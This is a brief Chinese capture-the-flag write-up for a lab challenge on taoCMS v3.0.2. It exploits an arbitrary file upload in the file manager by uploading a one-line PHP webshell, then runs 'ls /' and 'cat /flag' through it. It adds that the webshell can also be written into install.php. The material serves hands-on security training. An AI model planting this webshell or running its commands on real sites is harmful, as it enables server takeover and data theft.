春秋云境免费靶场挑战。 靶场介绍:taoCMS v3.0.2 文件管理处存在任意文件上传漏洞,攻击者可执行任意代码。
<?php
system($_GET[1]);
?>
PHP
http://eci-2ze6sij0ebixzvz39rhw.cloudeci1.ichunqiu.com/shell.php?1=ls%20/
页面显示:bin boot dev etc flag home lib lib64 media mnt opt proc root run sbin srv sys tmp usr var
http://eci-2ze6sij0ebixzvz39rhw.cloudeci1.ichunqiu.com/shell.php?1=cat%20/flag
flag{bcb7f369-2cd6-47ad-b522-591ce2bbd0bb}
虽然获取到flag,但是后知后觉应该不需要创建文件,编辑已有文件直接写入webshell也可以。 尝试在install.php中写入webshell发现还真可以。